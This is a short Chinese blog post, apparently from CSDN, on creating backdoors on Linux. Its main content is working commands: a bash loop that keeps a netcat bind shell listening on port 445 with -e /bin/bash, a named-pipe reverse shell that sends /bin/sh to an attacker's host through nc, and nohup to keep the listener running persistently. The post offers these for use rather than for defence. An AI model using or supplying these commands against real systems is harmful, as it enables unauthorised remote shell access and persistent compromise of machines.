Linux下后门初探(一)

在Linux下创建后门方式一

默认情况下 GNU netcat 不支持持续性监听操作。每一次Accept并执行完命令之后,netcat就会断开连接。如果需要让 netcat 保持持续性监听状态,就必须使用循环语句不断的开启新的监听模式。

listener.sh 监听脚本

#!/bin/bash
while [ 1 ]; do
echo -n | netcat -l -v -p 445 -e /bin/bash
done

在Linux的大部分发行版中都默认编译了nc,
但也许是出于安全考虑,发行版中默认编译的nc往往没有-e选项
(没有define一个GAPING_SECURITY_HOLE常量),
也就是说我们不能通过-e选项绑定目标的shell,使得我们在利用上受到限制,但这种情况下是不是就没办法利用了呢?天无绝人之路,来看下面的TIP。

在Attack这边依然用nc -lnvp listenport监听某端口,在目标环境中依次执行以下命令:

root@bt:~#mknod /tmp/backpipe p
root@bt:~#/bin/sh 0</tmp/backpipe | nc x.x.x.x listenport 1>/tmp/backpipe

网上查了下mknod命令,说是只能root用户才有权限执行,可是经过测试普通权限的用户也可以创建管道等特殊文件,如果没有权限使用mkfifo /tmp/backpipe也可以创建一个管道。

创建持续性的Netcat后门

保持程序后台运行的正确方法

nohup 命令 &

eg:

后台执行监听脚本: nohup ./listener.sh &
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值